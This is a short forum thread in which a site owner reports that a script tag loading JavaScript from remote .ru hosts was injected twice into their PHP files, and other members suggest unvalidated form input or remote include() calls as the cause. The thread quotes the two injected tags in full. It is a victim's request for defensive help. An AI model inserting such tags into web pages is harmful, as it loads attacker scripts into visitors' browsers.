Results 1 to 4 of 4

Thread: script added to files automatically

  1. #1
    Join Date
    Sep 2008

    script added to files automatically

    Erroneous redirection script was added in to the PHP files on the server..

    1st time, the script was:

    <script src=http://www.vtg43.ru/script.js></script>

    i modified the files, removed them, changed all my passwords, including FTP.

    but again the second time, script was added automatically to files. this time it was,

    ]<script src=http://www.pkseio.ru/script.js></script>

    when i checked out on net, i found out that these are sites related to SQL-injection attack.

    please help me out. y is this happeneng and how to prevent it...

  2. #2
    Join Date
    Mar 2007
    Sounds like you have a form that is not doing any validation. Do you have content being pulled from a database?

  3. #3
    Join Date
    Aug 2004
    Does any page on your site do an include() or require() based on a URL or form value? If so, if you do not properly validate/filter that value, it's relatively easy to make the page include a remote file that could do all sorts of things, such as injecting links into all of your pages. (This is one reason that many hosts disable the allow_url_fopen PHP option.)
    "Well done....Consciousness to sarcasm in five seconds!" ~ Terry Pratchett, Night Watch

    How to Ask Questions the Smart Way (not affiliated with this site, but well worth reading)

    My Blog
    cwrBlog: simple, no-database PHP blogging framework

  4. #4
    Join Date
    Sep 2008
    well, i do have to get data from the dabase. but i checked the database for any erroneous injections but did not find anything fishy..

    regarding includes, i have used includes but that is for my functions wit a file on my own server..havn't used require() though..
    thanx for your replies friends..i wish my problem is solved as soon as possible..waiting for further replies

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
HTML5 Development Center